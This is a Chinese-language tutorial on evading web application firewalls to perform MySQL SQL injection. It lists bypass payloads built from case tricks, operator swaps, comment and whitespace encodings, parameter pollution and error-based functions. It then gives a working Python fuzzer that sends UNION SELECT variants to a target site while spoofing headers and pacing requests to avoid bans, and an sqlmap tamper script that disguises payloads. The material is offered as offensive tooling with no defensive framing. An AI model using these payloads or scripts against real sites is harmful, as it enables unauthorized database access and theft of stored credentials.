WAF绕过必要条件
1,熟练掌握mysql函数和语法使用方法
2,深入了解中间件运行处理机制
3,了解WAF防护处理原理和方法
一,WAF绕过原理——白盒绕过
代码样例
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else
{
echo "Please input the ID as parameter with numeric value";
}
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)
return $id;
}
1,1代码分析
这个通过分析代码发现定义了blacklist黑名单功能然后是直接正则匹配过滤了or和and并忽略大小写
1,2绕过限制
因为这里匹配的是or 和AND
(1)大小写变形:Or OR oR
(2)等价替换:and=&& or=||
二,WAF绕过原理——黑盒绕过
1,架构层绕过WAF
(1)寻找源站——>针对云waf
(2)利用同网段——>绕过waf防护区域
(3)利用边界漏洞——>绕过waf防护区域
2,资源限制角度绕过waf
post传入大的数据包body
3,协议层面绕过waf检测
(1)协议为覆盖waf
请求方式变换:GET->POST
Content-Type变换:application/x-www-form-urlencoded————>multipart/form-data
(2)参数污染
index.php?id=1&id=2
这里遇到的是waf只是针对第一传参进行检测未对第二个传参进行检测
4,规则层面绕过
4.1sql注释符绕过
(1)union /**/select
(2)union /*aaaaaaa%01bbs*/select
(3)union /*aaaaaaaaaaaaaaaaaaaaa*/select
(4)内联注释:/*!xxxxxxxx*/
4.2空白符绕过
(1)mysql空白符
%09,%0A,%0B,%0C,%0D,%20,%A0,/*xxx*/`
(2)正则匹配的空白符:
%09,%0A,%0B,%0D,%20
4.3函数分隔符号
(1)concat%2520(
(2)concat/**/(
(3)concat%250c(
(4)concat%25a0(
4.4浮点数词解析
(1)selectfrom users where id=8E0union select 1,2,3,4,5,6,7#
(2)selectfrom users where id=8.0union select 1,2,3,4,5,6,7#
(3)select*from users where id=\Nunion select 1,2,3,4,5,6,7#
4.5利用报错进行sql注入
error-based sql注入函数非常容易被忽略
(1)extractvalue(1,concat(0x5c,md5(3)));
(2)updatexml(1,concat(0x5c,md5(3)));
(3)GeometryCollection(select *from (select *from (select @@version)x))
(4)polygon((select *from (select name_const(version(),1))x))
(5)linestring()
(6)multipoint()
(7)multilinestring()
(8)multipolygon()
4.6mysql特殊语法
select {x table_name}from{x information_schema.tables};
三,Fuzz绕过WAF
1,以注释符为例子不断fuzz
(1)先测试最基本的语句
union/**/select
(2)再测试中间引入特殊字符
union/aaaa%01bbs/select
(3)最后测试注释长度
union/aaaaaaaaaaaaaaaaaaaaaa/select
最基本的模式
union/anything/select
补充一下绕过的姿势,具体例子等我有空再补:
- 断包绕过
- 缓冲区溢出
- 协议不兼容
- 参数污染
- 大小写绕过
- 编码绕过
- 注释绕过
- 等价替换
FUZZ脚本编写
注:随机伪造UA头,每次请求都使用随机生成的UA头。为了减少复杂度,随机生成UA头的功能可以通过第三方模块库fake-useragent实现,
可以使用pip进行快速安装。
pip install fake-useragent
# ! -*- encoding:utf-8 -*-
#The author:@whit
import requests,time
def Jaky(url_start):
fuzz_aa = ['/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', '+', '|', '%00']
fuzz_bb = ['', ' ']
fuzz_cc = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j"]
fuzz = fuzz_aa + fuzz_bb + fuzz_cc
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25"
}
#也可以采用随机头,过waf更放心
for a in fuzz:
for b in fuzz:
for c in fuzz:
for d in fuzz:
exp = "/*!union" + a + b + c + d + "select*/ 1,2,3"
url = url_start + exp
res = requests.get(url=url, headers=headers)
time.sleep(2)#延迟2秒,防止被禁ip
print("Now URL:" + url)
if "技术支持" in res.text: #检测关键词需要自行修改
print("Find Fuzz bypass:" + url)
if __name__ == '__main__':
Jaky("http://www.xxx.cn/article/article.php?id=4")
#这里我只采用了简单的5层套用。应该是够用了。
#!/usr/bin/env python
#Author:whit
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
import os
__priority__ = PRIORITY.LOW
def dependencies():
singleTimeWarnMessage("whit_Bypass_whit '%s' is %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
def tamper(payload, **kwargs):
payload=payload.replace('AND','/*!53203520AND*/')
payload=payload.replace('ORDER','/*!53203520order*/')
payload=payload.replace("SELECT","/*!53203520select")
payload=payload.replace('USER())','hex(user/**/()))')
payload=payload.replace('SESSION_USER()','hex(SESSION_USER(-- B%0a))')
payload=payload.replace('UNION ALL SELECT','union/*!53203520/**/select*/')
return payload
篡改脚本编写